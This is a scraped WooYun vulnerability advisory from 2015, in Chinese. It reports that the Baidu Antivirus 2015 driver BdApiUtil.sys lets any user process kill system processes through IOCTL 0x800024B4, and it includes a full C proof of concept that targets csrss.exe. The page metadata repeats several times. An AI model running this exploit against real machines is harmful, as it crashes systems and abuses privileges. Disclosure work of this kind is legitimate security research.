Baidu Antivirus2015某驱动提权漏洞 | wooyun-2015-0122823| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122823

漏洞标题：Baidu Antivirus2015某驱动提权漏洞

漏洞作者：路人甲

提交时间：2015-06-26 10:03

修复时间：2015-09-29 10:04

公开时间：2015-09-29 10:04

漏洞类型：权限提升

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-26：细节已通知厂商并且等待厂商处理中
2015-07-01：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-08-25：细节向核心白帽子及相关领域专家公开
2015-09-04：细节向普通白帽子公开
2015-09-14：细节向实习白帽子公开
2015-09-29：细节向公众公开

简要描述：

Baidu Antivirus2015的BdApiUtil驱动提供了内核杀进程的方法，但对使用者和被杀进程都没有任何权限限制，任意进程都可以使用该方法。
在windows7以上的操作系统里，普通user进程通过该方法可以杀死system权限的进程，引发提权漏洞。

详细说明：

1.软件版本

2.BdApiUtil.sys版本：5.4.3.16113
3.漏洞分析：
BdApiUtil.sys驱动通过IoControlCode=0x800024B4的方式对外提供了内核模式杀进程的途径，但在IRP_MJ_DEVICE_CONTROL的处理逻辑中，没有对传递该控制码的调用者进行权限和身份验证，即使是user权限的进程也可以通过该漏洞杀死system权限的服务进程，包括系统关键服务在内。这就给恶意攻击者提供了提权手段，可以利用该漏洞杀死任意系统服务。

漏洞证明：

DWORD GetPidByName(LPCTSTR pName)
{
	if(!pName)
		return 0;
	HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if(INVALID_HANDLE_VALUE == hSnap)
		return 0;
	DWORD dwPid = 0;
	PROCESSENTRY32 item = { 0 };
	item.dwSize = sizeof(PROCESSENTRY32);
	BOOL bNext = Process32First(hSnap, &item);
	while (bNext)
	{
		if(StrStrI(item.szExeFile, pName))
		{
			dwPid = item.th32ProcessID;
			break;
		}
		item.dwSize = sizeof(PROCESSENTRY32);
		bNext = Process32Next(hSnap, &item);
	}
	CloseHandle(hSnap);
	return dwPid;
}
void Fuzz2(HANDLE hDev)
{
	DWORD dwReturned = 0;
	char input[4096] = { 0 };
	char output[4096] = { 0 };
	*((DWORD*)input) = GetPidByName(_T("csrss.exe"));
	DeviceIoControl(hDev,
		0x800024B4,
		(LPVOID)input,
		4,
		NULL,
		0,
		&dwReturned,
		NULL);
}
void Fuzz1()
{
	LPCTSTR DevName = _T("\\\\.\\BdApiUtil");
	HANDLE hDev = CreateFile(DevName,
		GENERIC_READ|GENERIC_WRITE,
		FILE_SHARE_READ|FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);
	if(INVALID_HANDLE_VALUE != hDev)
	{
		Fuzz2(hDev);
		CloseHandle(hDev);
	}
}
int _tmain(int argc, _TCHAR* argv[])
{
	Fuzz1();
	return 0;
}

修复方案：

对DeviceIoControl传递0x800024B4的调用者做身份和权限检查，只有合法进程才允许使用该提权方法。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-29 10:04

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122823

漏洞标题：Baidu Antivirus2015某驱动提权漏洞

相关厂商：百度

漏洞作者：路人甲

提交时间：2015-06-26 10:03

修复时间：2015-09-29 10:04

公开时间：2015-09-29 10:04

漏洞类型：权限提升

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122823

漏洞标题：Baidu Antivirus2015某驱动提权漏洞

相关厂商：百度

漏洞作者： 路人甲

提交时间：2015-06-26 10:03

修复时间：2015-09-29 10:04

公开时间：2015-09-29 10:04

漏洞类型：权限提升

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122823"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云